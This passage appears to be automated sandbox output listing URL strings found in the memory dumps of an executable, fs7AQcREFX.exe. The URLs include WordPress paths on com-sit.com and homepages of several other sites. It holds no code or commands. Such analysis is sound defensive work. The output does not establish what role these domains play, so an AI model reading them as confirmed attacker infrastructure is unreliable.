                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/nandakamrathENundDEweb-1.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/05/Slider0205-1.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/05/Slider0205DEmobile.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061D8000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.562867147.0000000000B18000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-json/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.com-sit.com%2F
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.com-sit.com%2F&#038;format=xm
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061D8000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.562867147.0000000000B18000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-json/wp/v2/pages/46
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/x-ray/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/xmlrpc.php?rsd
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/zertifikate/
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517712783.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.crcsi.org/
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.633716697.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.512849987.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.513941237.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.399549475.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517712783.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.514211859.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.515047997.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.513206122.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.397997118.0000000003600000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.credo.edu.pl/
                      Source: fs7AQcREFX.exe, 00000000.00000003.511573881.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630089947.00000000061C3000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630786286.00000000061C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.depalo.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AC3000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.618533651.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.389907841.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504952373.0000000000B17000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.506150313.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393801963.0000000000AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dgmna.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.618533651.0000000000AC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dgmna.com/x
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.399549475.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517712783.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.397033387.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.397997118.0000000003600000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.398199427.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.edimart.hu/
